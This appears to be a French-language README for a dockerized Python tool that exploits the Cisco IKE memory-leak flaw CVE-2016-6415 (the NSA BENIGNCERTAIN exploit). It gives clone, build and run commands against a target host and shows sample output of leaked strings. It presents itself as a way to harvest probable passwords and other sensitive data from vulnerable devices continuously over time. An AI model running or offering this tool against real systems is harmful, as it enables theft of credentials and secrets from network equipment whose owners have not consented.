
Réimplémentation du benigncertain-monitor de VirtueSecurity
Réimplémentation du benigncertain-monitor de VirtueSecurity. Ne possède pas toutes les mêmes options de payload que l'original, mais remplace le binaire bc-id par une meilleure preuve de concept par Ross Bradley, qui peut être étendue si nécessaire.
$ git clone https://github.com/3ndG4me/CVE-2016-6415-BenignCertain-Monitor.git
$ cd CVE-2016-6415-BenignCertain-Monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
Le service interrogera en continu le service vulnérable, extraira les chaînes ASCII de la mémoire, les stockera dans une base de données sqlite locale et affichera les chaînes les plus fréquemment observées :
Starting monitor against 10.0.6.1
string count
0 5$dx 3
1 0(0 3
2 $c{l 3
3 (0"t&j 3
4 R$dkd$hf7! 2
5 %d1N=8$i- 2
6 $c)P0 1
7 1NlD 1
8 1NlD' 1
9 $c)P(0 1
10 $c)P1@_ 1
Ceci est un script Python dockerisé qui fuite en continu la mémoire d'une cible vulnérable à l'exploit Cisco BENIGNCERTAIN de la NSA CVE-2016-6415.
Le script interroge périodiquement le service vulnérable pour identifier des mots de passe probables et d'autres informations potentiellement sensibles. Cela peut être utilisé pour récolter des données exploitables sur une période de temps plutôt que simplement une preuve de concept d'exploit.